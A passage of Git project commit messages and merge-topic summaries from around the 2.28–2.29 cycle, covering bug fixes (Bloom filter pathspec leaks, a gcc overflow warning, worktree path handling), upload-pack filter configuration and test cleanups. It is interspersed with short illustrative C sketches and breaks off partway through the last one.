help.c::list_common_guides_help to list_guides_help.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The guides 'gitcredentials' and 'gitremote-helpers' do not currently
appear in command-list.txt.
'gitcredentials' was forgotten back when guides were added to
command-list.txt in 1b81d8cb19 (help: use command-list.txt for the
source of guides, 2018-05-20).
'gitremote-helpers' was moved to section 7 in 439cc74632 (docs: move
gitremote-helpers into section 7, 2019-03-25), but command-list.txt was
not updated at the time.
Add these two guides to the list of guides in 'command-list.txt', so
that they appear in the output of 'git help --guides', and capitalize
the first word of the description of 'gitcredentials', as was done in
1b81d8c (help: use command-list.txt for the source of guides,
2018-05-20) for the other guides.
While at it, add a comment in Documentation/Makefile to remind developers
to update command-list.txt if they add a new guide.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Get rid of the trailing dot and mark for translation.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The pretend-object mechanism checks if the given object already
exists in the object store before deciding to keep the data
in-core, but the check would have triggered lazy fetching of such
an object from a promisor remote.
* jt/pretend-object-never-come-from-elsewhere:
sha1-file: make pretend_object_file() not prefetch
While packing many objects in a repository with a promisor remote,
lazily fetching missing objects from the promisor remote one by
one may be inefficient---the code now attempts to fetch all the
missing objects in batch (obviously this won't work for a lazy
clone that lazily fetches tree objects as you cannot even enumerate
what blobs are missing until you learn which trees are missing).
* jt/pack-objects-prefetch-in-batch:
pack-objects: prefetch objects to be packed
pack-objects: refactor to oid_object_info_extended
If we're given an empty pathspec, we refuse to set up bloom filters, as
described in f3c2a36810 (revision: empty pathspecs should not use Bloom
filters, 2020-07-01).
But before the empty string check, we drop any trailing slash by
allocating a new string without it. So a pathspec consisting only of "/"
will allocate that string, but then still cause us to bail, leaking the
new string. Let's make sure to free it.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Running t4216 with ASan results in it complaining of an out-of-bounds
read in prepare_to_use_bloom_filter(). The issue is this code to strip a
trailing slash:
last_index = pi->len - 1;
if (pi->match[last_index] == '/') {
because we have no guarantee that pi->len isn't zero. This can happen if
the pathspec is ".", as we translate that to an empty string. And if
that read of random memory does trigger the conditional, we'd then do an
out-of-bounds write:
path_alloc = xstrdup(pi->match);
path_alloc[last_index] = '\0';
Let's make sure to check the length before subtracting. Note that for an
empty pathspec, we'd end up bailing from the function a few lines later,
which makes it tempting to just:
if (!pi->len)
	return;
early here. But our code here is stripping a trailing slash, and we need
to check for emptiness after stripping that slash, too. So we'd have two
blocks, which would require repeating some cleanup code.
Instead, just skip the trailing-slash check for an empty string. Setting
last_index at all in that case is awkward since it will have a nonsense
value (and it uses an "int", which is a too-small type for a string
anyway). So while we're here, let's:
- drop last_index entirely; it's only used in two spots right next to
each other and writing out "pi->len - 1" in both is actually easier
to follow
- use xmemdupz() to duplicate the string. This is slightly more
efficient, but more importantly makes the intent more clear by
allocating the correct-sized substring in the first place. It also
eliminates any question of whether path_alloc is as long as
pi->match (which it would not be if pi->match has any embedded NULs,
though in practice this is probably impossible).
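The approach described above (check the length first, then duplicate only the bytes we want) might look roughly like the following. This is a standalone sketch, not the code in revision.c: `sketch_strip_trailing_slash()` is a hypothetical helper, and plain malloc()/memcpy() stand in for xmemdupz().

```c
#include <stdlib.h>
#include <string.h>

/*
 * Return a newly allocated copy of the first "len" bytes of "match",
 * minus one trailing slash if present. The length is checked before
 * "len - 1" is computed, so an empty string is never indexed at -1.
 * Returns NULL on allocation failure; the caller frees the result.
 */
static char *sketch_strip_trailing_slash(const char *match, size_t len)
{
	char *out;

	if (len > 0 && match[len - 1] == '/')
		len--;

	out = malloc(len + 1);
	if (!out)
		return NULL;
	memcpy(out, match, len);
	out[len] = '\0';
	return out;
}
```

Because the copy is sized from the adjusted length, there is no later write of a terminator into the middle of a longer buffer, and the emptiness check can run once on the result.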
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Compiling with gcc-10, -O2, and -fsanitize=undefined results in a
compiler warning:
config.c: In function ‘git_config_copy_or_rename_section_in_file’:
config.c:3170:17: error: writing 1 byte into a region of size 0 [-Werror=stringop-overflow=]
3170 | output[0] = '\t';
| ~~~~~~~~~~^~~~~~
config.c:3076:7: note: at offset -1 to object ‘buf’ with size 1024 declared here
3076 | char buf[1024];
| ^~~
This is a false positive. The interesting lines of code are:
int i;
char *output = buf;
...
for (i = 0; buf[i] && isspace(buf[i]); i++)
; /* do nothing */
...
int offset;
offset = section_name_match(&buf[i], old_name);
if (offset > 0) {
...
output += offset + i;
if (strlen(output) > 0) {
/*
* More content means there's
* a declaration to put on the
* next line; indent with a
* tab
*/
output -= 1;
output[0] = '\t';
}
}
So we do assign output to buf initially. Later we increment it based on
"offset" and "i" and then subtract "1" from it. That latter step is what
the compiler is complaining about; it could lead to going off the left
side of the array if "output == buf" at the moment of the subtraction.
For that to be the case, then "offset + i" would have to be 0. But that
can't happen:
- we know that "offset" is at least 1, since we're in a conditional
block that checks that
- we know that "i" is not negative, since it started at 0 and only
incremented over whitespace
So the sum must be at least 1, and therefore it's OK to subtract one
from "output".
But that's not quite the whole story. Since "i" is an int, it could in
theory be possible to overflow to negative (when counting whitespace on
a very large string). But we know that's impossible because we're
counting the 1024-byte buffer we just fed to fgets(), so it can never be
larger than that.
Switching the type of "i" to "unsigned" makes the warning go away, so
let's do that.
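For readers who want to follow the pointer arithmetic in isolation, the sketch below reproduces the indentation step with an unsigned index. The function name indent_rest() is made up for this example, and its "offset" parameter merely stands in for a positive return value of section_name_match(); this is not the code in config.c.

```c
#include <assert.h>
#include <ctype.h>
#include <string.h>

/*
 * Skip leading whitespace with an unsigned index, advance past a
 * matched section header of "offset" bytes and, if any content
 * remains on the line, back up one byte and overwrite it with a tab.
 */
static char *indent_rest(char *buf, unsigned offset)
{
	unsigned i;
	char *output = buf;

	assert(buf && offset > 0);
	for (i = 0; buf[i] && isspace((unsigned char)buf[i]); i++)
		; /* do nothing */
	assert(offset + i <= strlen(buf));

	output += offset + i; /* at least buf + 1, since offset >= 1 */
	if (strlen(output) > 0) {
		output -= 1; /* still at or after buf */
		output[0] = '\t';
	}
	return output;
}
```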
Arguably size_t is an even better type (for this and for the other
length fields), but switching to it produces a similar but distinct
warning:
config.c: In function ‘git_config_copy_or_rename_section_in_file’:
config.c:3170:13: error: array subscript -1 is outside array bounds of ‘char[1024]’ [-Werror=array-bounds]
3170 | output[0] = '\t';
| ~~~~~~^~~
config.c:3076:7: note: while referencing ‘buf’
3076 | char buf[1024];
| ^~~
If we were to ever switch off of fgets() to strbuf_getline() or similar,
we'd probably need to use size_t to avoid other overflow problems. But
for now we know we're safe because of the small fixed size of our
buffer.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When citing other Git commands, rather than merely formatting them with
a fixed-width typeface, improve the reader experience by linking to them
directly via `linkgit:`.
Suggested-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When reading the rendered description of `add`, it's easy to trip over
and miss the end of one sentence and the start of the next, making it
seem as if they are part of the same statement, separated only by a
dash:
... specific files such as HEAD, index, etc. - may also be
specified as <commit-ish>; it is synonymous with...
This can be particularly confusing since the thoughts expressed by the
two sentences are unrelated. Reduce the likelihood of confusion by
making it obvious that the two sentences are distinct.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As originally composed, git-worktree.txt employed a mix of "worktree"
and "working tree" which was inconsistent and potentially confusing to
readers. bc483285b7 (Documentation/git-worktree: consistently use term
"linked working tree", 2015-07-20) undertook the task of employing the
term "working tree" consistently throughout the document and avoiding
"worktree" altogether for descriptive text. Since that time, some
instances of "worktree" have crept back in. Continue the work of
bc483285b7 by transforming these to "working tree", as well.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
git-worktree documentation generally does a good job of formatting
literal text using a fixed-width typeface; however, some instances of
unformatted literal text have crept in over time. Fix these.
While at it, also fix a few incorrect typefaces resulting from wrong
choice of Asciidoc quotes.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In b79cf959b2 (upload-pack.c: allow banning certain object filter(s),
2020-02-26), we introduced functionality to disallow certain object
filters from being chosen from within 'git upload-pack'. Traditionally,
administrators use this functionality to disallow filters that are known
to perform slowly, e.g., those that do not have bitmap-level
filtering.
In the past, '--filter=tree:<n>' was one such filter that did not
have bitmap-level filtering support, and so was likely to be banned by
administrators.
However, in the previous couple of commits, we introduced bitmap-level
filtering for the case when 'n' is equal to '0', i.e., as if we had a
'--filter=tree:none' choice.
While it would be sufficient to simply write
$ git config uploadpackfilter.tree.allow true
(since it would allow all values of 'n'), we would like to be able to
allow this filter for certain values of 'n', i.e., those no greater than
some pre-specified maximum.
In order to do this, introduce a new configuration key, as follows:
$ git config uploadpackfilter.tree.maxDepth <m>
where '<m>' specifies the maximum allowed value of 'n' in the filter
'tree:n'. Administrators who wish to allow for only the value '0' can
write:
$ git config uploadpackfilter.tree.allow true
$ git config uploadpackfilter.tree.maxDepth 0
which allows '--filter=tree:0', but no other values.
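The decision described above can be sketched as follows. This is a simplified model written for this note, assuming the two settings are consulted exactly as the text describes; struct tree_filter_policy and tree_filter_allowed() are hypothetical names, not the data structures used by upload-pack.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical model of the two settings discussed above. */
struct tree_filter_policy {
	bool allow;              /* uploadpackfilter.tree.allow */
	bool has_max_depth;      /* is uploadpackfilter.tree.maxDepth set? */
	unsigned long max_depth; /* uploadpackfilter.tree.maxDepth */
};

/* Decide whether a request for '--filter=tree:<n>' is acceptable. */
static bool tree_filter_allowed(const struct tree_filter_policy *p,
				unsigned long n)
{
	assert(p);
	if (!p->allow)
		return false;
	if (p->has_max_depth && n > p->max_depth)
		return false;
	return true;
}
```

With allow set to true and maxDepth set to 0, only n == 0 passes; with maxDepth left unset, every value of n passes.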
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Acked-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Git clients may ask the server for a partial set of objects, where the
set of objects being requested is refined by one or more object filters.
Server administrators can configure 'git upload-pack' to allow or ban
these filters by setting the 'uploadpack.allowFilter' variable to
'true' or 'false', respectively.
However, administrators using bitmaps may wish to allow certain kinds of
object filters, but ban others. Specifically, they may wish to allow
object filters that can be optimized by the use of bitmaps, while
rejecting other object filters that cannot be and thus represent a perceived
performance degradation (as well as an increased load factor on the
server).
Allow configuring 'git upload-pack' to support object filters on a
case-by-case basis by introducing two new configuration variables:
- 'uploadpackfilter.allow'
- 'uploadpackfilter.<kind>.allow'
where '<kind>' may be one of 'blobNone', 'blobLimit', 'tree', and so on.
Setting the second configuration variable for any valid value of
'<kind>' explicitly allows or disallows restricting that kind of object
filter.
If a client requests the object filter <kind> and the respective
configuration value is not set, 'git upload-pack' will default to the
value of 'uploadpackfilter.allow', which itself defaults to 'true' to
maintain backwards compatibility. Note that this differs from
'uploadpack.allowfilter', which controls whether or not the 'filter'
capability is advertised.
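The fallback order can be pictured with a small tri-state lookup. This is only a sketch of the rule stated above (per-kind value first, then 'uploadpackfilter.allow', then the built-in default of 'true'); the enum and function names are invented for illustration.

```c
#include <assert.h>
#include <stdbool.h>

/* A configuration value that may be absent. */
enum tristate { UNSET = -1, DENY = 0, ALLOW = 1 };

/*
 * per_kind models uploadpackfilter.<kind>.allow and global models
 * uploadpackfilter.allow. An unset per-kind value falls back to the
 * global one, which in turn defaults to "true".
 */
static bool filter_kind_allowed(enum tristate per_kind, enum tristate global)
{
	if (per_kind != UNSET)
		return per_kind == ALLOW;
	if (global != UNSET)
		return global == ALLOW;
	return true; /* backwards-compatible default */
}
```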
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a subsequent commit, we will add configuration options that are
specific to each kind of object filter, in which case it is handy to
have a function that translates between 'enum
list_objects_filter_choice' and an appropriate configuration-friendly
string.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Acked-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This reverts commit 508fd8e8ba.
In 6e6029a8 (fmt-merge-msg: allow merge destination to be omitted again)
we get back the behavior where merges against 'master', by default, do
not include "into 'master'" at the end of the merge message. This test
fix is no longer needed.
Signed-off-by: Emily Shaffer <emilyshaffer@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Make it clear that the filename has only the rest of the object ID,
not the entirety of it.
Signed-off-by: Noam Yorav-Raphael <noamraph@gmail.com>
Acked-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'merge' command is not the only one that does merges; other commands
like checkout -m or rebase do as well. Unfortunately, the only area of
the code that checked for the "merge.renormalize" config setting was in
builtin/merge.c, meaning it could only affect merges performed by the
"merge" command. Move the handling of this config setting to
merge_recursive_config() so that other commands can benefit from it as
well. Fixes a few tests in t6038.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
t6038.11, 'cherry-pick patch from after text=auto' was a test of
undefined behavior. To make matters worse, while there are a couple
possible correct answers, this test was coded to only check for an
obviously incorrect answer. And the final cherry on top is that the
test is marked test_expect_failure, meaning it can't provide much value,
other than possibly confusing future folks who come along and try to
work on attributes and look at existing tests. Because of all these
problems, just remove the test.
But for any future code spelunkers, here's my understanding of the two
possible correct answers:
This test was set up so that on a branch with no .gitattributes file,
you cherry-picked a patch from a branch that had a .gitattributes file
(containing '* text=auto'). Further, the two branches had a file which
differed only in line endings. In this situation, correct behavior is
not well defined: should the .gitattributes file affect the merge or
not?
If the .gitattributes file on the other branch should not affect the
merge, then we would have a content conflict with all three stages
different (the merge base didn't match either side).
If the .gitattributes file from the other branch should affect the
merge, then we would expect the line endings to be normalized to LF for
the version to be recorded in the repository. This would mean that a
three-way content merge on the file that differed in line endings
would see that the versions on both sides matched, and so the
cherry-pick would have no conflicts and could succeed. The line
endings in the file as recorded in the repository
will change from CRLF to LF. The version checked out in the working
copy will depend on the platform (since there's no eol attribute defined
for the file).
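To make the second scenario concrete, the following sketch normalizes CRLF to LF and then compares two versions of a file. It is a toy model of the idea only: the function names are hypothetical, and Git's real conversion honors attributes and heuristics that are not modeled here.

```c
#include <assert.h>
#include <string.h>

/* Convert every CRLF pair to LF in place; return the new length. */
static size_t crlf_to_lf(char *buf, size_t len)
{
	size_t in, out = 0;

	assert(buf);
	for (in = 0; in < len; in++) {
		if (buf[in] == '\r' && in + 1 < len && buf[in + 1] == '\n')
			continue; /* drop the CR, keep the LF */
		buf[out++] = buf[in];
	}
	return out;
}

/* Nonzero when the two buffers are identical once normalized. */
static int same_after_normalization(char *a, size_t alen,
				    char *b, size_t blen)
{
	alen = crlf_to_lf(a, alen);
	blen = crlf_to_lf(b, blen);
	return alen == blen && !memcmp(a, b, alen);
}
```

Two sides that differ only in line endings compare equal after this step, which is why a merge that renormalizes would see nothing to conflict over.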
Also, as a final side note, this test expected an error message that was
written for the old scripted version of cherry-pick; cherry-pick no
longer emits the error message that was encoded in this test. So it was
wrong for yet another reason.
Given that the handling of .gitattributes is not well defined and this
test was obviously broken and could do nothing but confuse future
readers, just remove it.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
t6038 had a pair of tests that were expected to fail, but weren't
failing for the expected reason. Both were meant to do a merge that
could be done cleanly after renormalization, but were supposed to fail
for lack of renormalization. Unfortunately, both tests had staged
changes, and checkout -m would abort due to the presence of those staged
changes before even attempting a merge.
Fix this first issue by utilizing git-restore instead of git-checkout,
so that the index is left alone and just the working directory gets the
changes we want.
However, there is a second issue with these tests. Technically, they
just wanted to verify that after renormalization, no conflicts would be
present. This could have been checked for by grepping for a lack of
conflict markers, but the test instead tried to compare the working
directory files to an expected result. Unfortunately, the setting of
"text=auto" without setting core.eol to any value meant that the content
of the file (in particular, the line endings) would be
platform-dependent and the tests could only pass on some platforms.
Replace the existing comparison with a call to 'git diff --no-index
--ignore-cr-at-eol' to verify that the contents, other than possible
carriage returns in the file, match the expected results and in
particular that the file has no conflicts from the checkout -m
operation.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Write the hexadecimal object ID directly into the destination buffer
using oid_to_hex_r() instead of writing it into a static buffer first
using oid_to_hex() and then copying it from there using memcpy().
This is shorter, simpler and a bit more efficient.
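The difference between the two styles can be seen in a small self-contained sketch. hash_to_hex_r() below is a hypothetical helper written for this example that follows the same "caller supplies the buffer" convention; it is not Git's oid_to_hex_r() and takes a raw byte array rather than an object ID.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Write 2 * len hex digits plus a NUL into out and return out.
 * The caller must provide at least 2 * len + 1 bytes.
 */
static char *hash_to_hex_r(char *out, const unsigned char *hash, size_t len)
{
	static const char hex[] = "0123456789abcdef";
	size_t i;

	assert(out && hash);
	for (i = 0; i < len; i++) {
		out[2 * i] = hex[hash[i] >> 4];
		out[2 * i + 1] = hex[hash[i] & 0xf];
	}
	out[2 * len] = '\0';
	return out;
}

/*
 * Build "<prefix><hex>" in dst. The hex digits are written straight
 * into their final position, so no temporary buffer or second copy
 * is needed. dst must hold strlen(prefix) + 2 * len + 1 bytes.
 */
static char *format_with_prefix(char *dst, const char *prefix,
				const unsigned char *hash, size_t len)
{
	size_t plen = strlen(prefix);

	memcpy(dst, prefix, plen);
	hash_to_hex_r(dst + plen, hash, len);
	return dst;
}
```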
Reviewed-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commits 7c0a6c8e47 ("merge-recursive: move some definitions around to
clean up the header", 2019-08-17), and b4db8a2b76 ("merge-recursive:
remove useless parameter in merge_trees()", 2019-08-17) added some
useful documentation to the functions, but had a few places where the
new comments were unclear or even misleading. Fix those comments.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We use
printf '\0'
to generate a NUL byte which we then `dd` into the packfile to ensure
that we modify the first byte of the first object, thereby
(probabilistically) invalidating the checksum. Except the single quotes
we're using are interpreted to match with the ones we enclose the whole
test in. So we actually execute
printf \0
and end up injecting the ASCII code for "0", 0x30, instead.
The comment right above this `printf` invocation says that "at least one
of [the type bits] is not zero, so setting the first byte to 0 is
sufficient". Substituting "0x30" for "0" in that comment won't do: we'd
need to reason about which bits go where and just what the packfile
looks like that we're modifying in this test.
Let's avoid all of that by actually executing
printf "\0"
to generate a NUL byte, as intended.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git merge" learned to selectively omit " into <branch>" at the end
of the title of default merge message with merge.suppressDest
configuration.
* jc/fmt-merge-msg-suppress-destination:
fmt-merge-msg: allow merge destination to be omitted again
Revert "fmt-merge-msg: stop treating `master` specially"
In order for "git-worktree list" to present consistent results,
get_main_worktree() performs manual normalization on the repository
path (returned by get_common_dir()) after passing it through
strbuf_add_absolute_path(). In particular, it cleans up the path for
three distinct cases when the current working directory is (1) the main
worktree, (2) the .git/ subdirectory, or (3) a bare repository.
The need for such special-cases is a direct consequence of employing
strbuf_add_absolute_path() which, for the sake of efficiency, doesn't
bother normalizing the path (such as folding out redundant path
components) after making it absolute. Lack of normalization is not
typically a problem since redundant path elements make no difference
when working with paths at the filesystem level. However, when preparing
paths for presentation, possible redundant path components make it
difficult to ensure consistency.
Eliminate the need for these special cases by instead making the path
absolute via strbuf_add_real_path() which normalizes the path for us.
Once normalized, the only case we need to handle manually is converting
it to the path of the main worktree by stripping the "/.git" suffix.
This stripping of the "/.git" suffix is a regular idiom in
worktree-related code; for instance, it is employed by
get_linked_worktree(), as well.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The content of .git/worktrees/<id>/gitdir must be a path of the form
"/path/to/worktree/.git". Any other content would be indicative of a
corrupt "gitdir" file. To determine the path of the worktree itself one
merely strips the "/.git" suffix, and this is indeed how the worktree
path was determined from inception.
However, 5193490442 (worktree: add a function to get worktree details,
2015-10-08) extended the path manipulation in a mysterious way. If it is
unable to strip "/.git" from the path, then it instead reports the
current working directory as the linked worktree's path:
if (!strbuf_strip_suffix(&worktree_path, "/.git")) {
strbuf_reset(&worktree_path);
strbuf_add_absolute_path(&worktree_path, ".");
strbuf_strip_suffix(&worktree_path, "/.");
}
This logic is clearly bogus; it can never be generally correct behavior.
It materialized out of thin air in 5193490442 with neither explanation
nor tests to illustrate a case in which it would be desirable.
It's possible that this logic was introduced to somehow deal with a
corrupt "gitdir" file, so that it returns _some_ sort of meaningful
value, but returning the current working directory is not helpful. In
fact, it is quite misleading (except in the one specific case when the
current directory is the worktree whose "gitdir" entry is corrupt).
Moreover, reporting the corrupt value to the user, rather than fibbing
about it and hiding it outright, is more helpful since it may aid in
diagnosing the problem.
Therefore, drop this bogus path munging and restore the logic to the
original behavior of merely stripping "/.git".
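A minimal sketch of the restored behavior, assuming a plain NUL-terminated string instead of a strbuf. strip_suffix_in_place() is a hypothetical helper that is only loosely modeled on strbuf_strip_suffix(); when the suffix is absent the value is left untouched so it can be reported as-is.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/*
 * If path ends with suffix, truncate it in place and return true.
 * Otherwise leave path unchanged and return false.
 */
static bool strip_suffix_in_place(char *path, const char *suffix)
{
	size_t plen, slen;

	assert(path && suffix);
	plen = strlen(path);
	slen = strlen(suffix);
	if (plen < slen || strcmp(path + plen - slen, suffix))
		return false;
	path[plen - slen] = '\0';
	return true;
}
```

A well-formed "gitdir" value yields the worktree path, while a corrupt one stays visible to the user instead of being replaced by the current directory.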
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This code has been unused since fa099d2322 (worktree.c: kill parse_ref()
in favor of refs_resolve_ref_unsafe(), 2017-04-24), so drop it.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The content of this strbuf is unconditionally detached several lines
before the strbuf_release() and the strbuf is never touched again after
that point.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
b6839fda68 (ref-filter: add support for %(contents:size), 2020-07-16)
added a new format for ref-filter, and added a function to generate
tests for this new feature in t6300. Unfortunately, it tries to run
`test_expect_sucess' instead of `test_expect_success', and writes
$expect to `expected', but tries to read `expect'. Those two issues
probably went unnoticed because the script only printed errors, but did
not crash. This fixes these issues.
Signed-off-by: Alban Gruin <alban.gruin@gmail.com>
Reviewed-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
523fa69c (reflog: cleanse messages in the refs.c layer, 2020-07-10)
centralized reflog normalization. However, the normalization added a
leading "\t" to the message. This is an artifact of the reflog
storage format in the files backend, so it should be added there.
Routines that parse back the reflog (such as grab_nth_branch_switch)
expect the "\t" to not be in the message, so without this fix, git
with reftable cannot process the "@{-1}" syntax.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
CI fixup---tests of Python scripts didn't use the version of Git
that is being tested.
* sg/ci-git-path-fix-with-pyenv:
ci: use absolute PYTHON_PATH in the Linux jobs
The "argc" and "argv" names made sense when the struct was argv_array,
but now they're just confusing. Let's rename them to "nr" (which we use
for counts elsewhere) and "v" (which is rather terse, but reads well
when combined with typical variable names like "args.v").
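To show how the shorter names read at a call site, here is a toy string vector with "nr" and "v" members. It is a sketch written for this note, not the struct being renamed: the type name str_vec, the "alloc" member, and str_vec_push() are assumptions, and the strings are borrowed rather than copied.

```c
#include <assert.h>
#include <stdlib.h>

/* Toy vector of borrowed strings; v is kept NULL-terminated. */
struct str_vec {
	const char **v;
	size_t nr;
	size_t alloc;
};

/* Append s, growing the array as needed; abort on allocation failure. */
static void str_vec_push(struct str_vec *args, const char *s)
{
	assert(args && s);
	if (args->nr + 2 > args->alloc) {
		size_t new_alloc = args->alloc ? args->alloc * 2 : 8;
		const char **nv = realloc(args->v, new_alloc * sizeof(*nv));

		if (!nv)
			abort();
		args->v = nv;
		args->alloc = new_alloc;
	}
	args->v[args->nr++] = s;
	args->v[args->nr] = NULL; /* keep the terminator in place */
}
```

A caller would then write loops such as "for (i = 0; i < args.nr; i++) use(args.v[i]);", which is the kind of expression the rename is meant to make readable.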
Note that we have to update all of the callers immediately. Playing
tricks with the preprocessor is hard here, because we wouldn't want to
rewrite unrelated tokens.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git mv src dst", when src is an unmerged path, errored out
correctly but with an incorrect error message to claim that src is
not tracked, which has been clarified.
* ct/mv-unmerged-path-error:
git-mv: improve error message for conflicted file
Pushing a ref whose name contains non-ASCII character with the
"--force-with-lease" option did not work over smart HTTP protocol,
which has been corrected.
* bc/push-cas-cquoted-refname:
remote-curl: make --force-with-lease work with non-ASCII ref names
"git for-each-ref --format=<>" learned %(contents:size).
* cc/pretty-contents-size:
ref-filter: add support for %(contents:size)
t6300: test refs pointing to tree and blob
Documentation: clarify %(contents:XXXX) doc
Fetching from a lazily cloned repository resulted at the server
side in attempts to lazy fetch objects that the client side has,
many of which will not be available from the third-party anyway.
* jt/avoid-lazy-fetching-upon-have-check:
upload-pack: do not lazy-fetch "have" objects
Dev support to limit the use of test_must_fail to only git commands.
* dl/test-must-fail-fixes-6:
test-lib-functions: restrict test_must_fail usage
t9400: don't use test_must_fail with cvs
t9834: remove use of `test_might_fail p4`
t7107: don't use test_must_fail()
t5324: reorder `run_with_limited_open_files test_might_fail`
t3701: stop using `env` in force_color()
With the base fix to 2.27 regression, any new extensions in a v0
repository would still be silently honored, which is not quite
right. Instead, complain and die loudly.
* jk/reject-newer-extensions-in-v0:
verify_repository_format(): complain about new extensions in v0 repo
Preliminary clean-up of the refs API in preparation for adding a
new refs backend "reftable".
* hn/reftable:
reflog: cleanse messages in the refs.c layer
bisect: treat BISECT_HEAD as a pseudo ref
t3432: use git-reflog to inspect the reflog for HEAD
lib-t6000.sh: write tag using git-update-ref
"git clone --separate-git-dir=$elsewhere" used to stomp on the
contents of the existing directory $elsewhere, which has been
taught to fail when $elsewhere is not an empty directory.
* bw/fail-cloning-into-non-empty:
git clone: don't clone into non-empty directory
"git help log" has been enhanced by sharing more material from the
documentation for the underlying "git rev-list" command.
* pb/log-rev-list-doc:
git-log.txt: include rev-list-description.txt
git-rev-list.txt: move description to separate file
git-rev-list.txt: tweak wording in set operations
git-rev-list.txt: fix Asciidoc syntax
revisions.txt: describe 'rev1 rev2 ...' meaning for ranges
git-log.txt: add links to 'rev-list' and 'diff' docs
The test framework has been updated so that most tests will run
with predictable (artificial) timestamps.
* jk/tests-timestamp-fix:
t9100: stop depending on commit timestamps
test-lib: set deterministic default author/committer date
t9100: explicitly unset GIT_COMMITTER_DATE
t5539: make timestamp requirements more explicit
t9700: loosen ident timezone regex
t6000: use test_tick consistently
Updates to the changed-paths bloom filter.
* ds/commit-graph-bloom-updates:
commit-graph: check all leading directories in changed path Bloom filters
revision: empty pathspecs should not use Bloom filters
revision.c: fix whitespace
commit-graph: check chunk sizes after writing
commit-graph: simplify chunk writes into loop
commit-graph: unify the signatures of all write_graph_chunk_*() functions
commit-graph: persist existence of changed-paths
bloom: fix logic in get_bloom_filter()
commit-graph: change test to die on parse, not load
commit-graph: place bloom_settings in context
The changed-path Bloom filter is improved using ideas from an
independent implementation.
* sg/commit-graph-cleanups:
commit-graph: simplify write_commit_graph_file() #2
commit-graph: simplify write_commit_graph_file() #1
commit-graph: simplify parse_commit_graph() #2
commit-graph: simplify parse_commit_graph() #1
commit-graph: clean up #includes
diff.h: drop diff_tree_oid() & friends' return value
commit-slab: add a function to deep free entries on the slab
commit-graph-format.txt: all multi-byte numbers are in network byte order
commit-graph: fix parsing the Chunk Lookup table
tree-walk.c: don't match submodule entries for 'submod/anything'
In Git 2.28, we stopped special casing 'master' when producing the
default merge message by just removing the code to squelch "into
'master'" at the end of the message.
Introduce multi-valued merge.suppressDest configuration variable
that gives a set of globs to match against the name of the branch
into which the merge is being made, to let users specify for which
branch fmt-merge-msg's output should be shortened. When it is not
set, 'master' is used as the sole value of the variable by default.
The above move mostly restores the pre-2.28 default in repositories
that have no relevant configuration.
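The matching rule can be sketched as below. Note the assumptions: POSIX fnmatch() is used here as a stand-in for whatever glob matcher Git uses internally, dest_suppressed() is a made-up name, and only the "unset means 'master'" default described above is modeled.

```c
#include <assert.h>
#include <fnmatch.h>
#include <stdbool.h>
#include <stddef.h>

/*
 * Return true when "into <branch>" should be left out of the merge
 * title. globs/nr model the values of merge.suppressDest; with no
 * values configured, 'master' is the only pattern.
 */
static bool dest_suppressed(const char *branch,
			    const char *const *globs, size_t nr)
{
	static const char *const default_globs[] = { "master" };
	size_t i;

	assert(branch);
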